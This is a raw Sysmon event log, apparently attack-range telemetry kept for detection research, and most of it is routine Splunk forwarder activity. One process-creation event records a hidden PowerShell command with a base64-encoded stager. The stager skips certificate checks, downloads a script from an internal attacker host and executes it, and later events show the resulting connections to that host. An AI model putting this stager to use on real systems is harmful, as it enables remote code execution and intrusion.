13:20:31.490{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A19F-6140-9A56-04000000C801}5400C:\Windows\system32\query.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.490{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A19F-6140-9A56-04000000C801}5400C:\Windows\system32\query.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.498{B81B27B7-A19F-6140-9A56-04000000C801}5400C:\Windows\System32\query.exe10.0.14393.0 (rs1_release.160715-1616)MultiUser Query UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationquery.exe"C:\Windows\system32\query.exe" userC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=45AAE6BB615AE7972BB24A317F6AFC3E,SHA256=0141B31C3583FC37D82B2506D0806E2060D34B89CD507A329A69162F435A8CE0,IMPHASH=56DFF75685B873041372297280679542{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000036498049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.358{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A59E18B81DDC0CB81F86618449B0989F,SHA256=73304D53C54A0082876A00FA5E441144DCF4D1130D09DB79F38167699A74B058,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:32.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=512C609AFA6AB359EF9F5A18CCB481E8,SHA256=1B47A73E656CABD47C1FFE112F0C842D12992F98CAEAEEAA2C1CC8CE1CD7B466,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:32.603{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:32.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=389729B84981C62CE3D122F55280EC51,SHA256=8B8846E77C441F8EB09AE0F44A1507EB05B951F23DB45EA9B175E4D27A9792F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:32.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1E3EC36790A277046D82D48628B8911,SHA256=7659DDF05FDDA571D80AE34DBFCF97C1B05708FB01BE8F7F36160D72968D90F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.740{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50608-false10.0.1.12-8000- 23542300x800000000000000036498081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:33.387{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=857EB33BC5DE210E9540A1AD5C839BDD,SHA256=61D8435CCF1C8B6BF1D3F5C498B1C48AE970EB1E3011B3A65EB28ABA432E4C5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.544{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50610-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:03.162{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50609-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:34.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C390AEB247DF1F7F319D6C8EBE8E992,SHA256=2418A9B80DF845BD35D4A15DA90DDE01974F9724B46DAEB89542ACF68D556D8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:04.274{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50611-false10.0.1.12-8089- 23542300x800000000000000036498084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:35.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D05DBC5A38A8557DADA9ADEE66683AE,SHA256=511FDC76056D96EBCDAB658EB9048876DAEA1578F94928048EF1F07E08A4E83F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:36.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29A22C90B30AC0EF1773566E743F0591,SHA256=1D829DE4031A9403ACCCFEA66D9B01D2F850703BE8413702EDAF213B860A9F6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.983{B81B27B7-A1A5-6140-9C56-04000000C801}70966156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=31FB501EAFB982F2C85FB3B5A065383A,SHA256=5AE9627A4BE50143DF72B050B537FA03B41669CBABFFE034993A27E15330B4EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1A5-6140-9C56-04000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A1A5-6140-9C56-04000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.813{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1A5-6140-9C56-04000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.799{B81B27B7-A1A5-6140-9C56-04000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.482{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C35C7561BB7197CFF5CA4FDFB91B05F5,SHA256=FDD7D441D371E61B192697515D18C90CBFA7632D01A8AD0C45CACE0C20AC65A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F343B174F2A7150354AE87BC1E8240B,SHA256=C04FECCDC1193E51A5216C044202FD88F0078E83FE66298B45ECE53C271E1ABA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=724D1822279462A7BD21E15524A24E58,SHA256=FD25993DF3512EE5FD6C0969D9B52379B351D62AEE647445F5D5E1A985308B82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.666{B81B27B7-A1A6-6140-9D56-04000000C801}58884504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1979CF3C92D31F36DE72EDA48044B12,SHA256=3A95063884A969D8DE197DF659E03000440C339AF9F4C2B6BB81A0C42FB70D59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 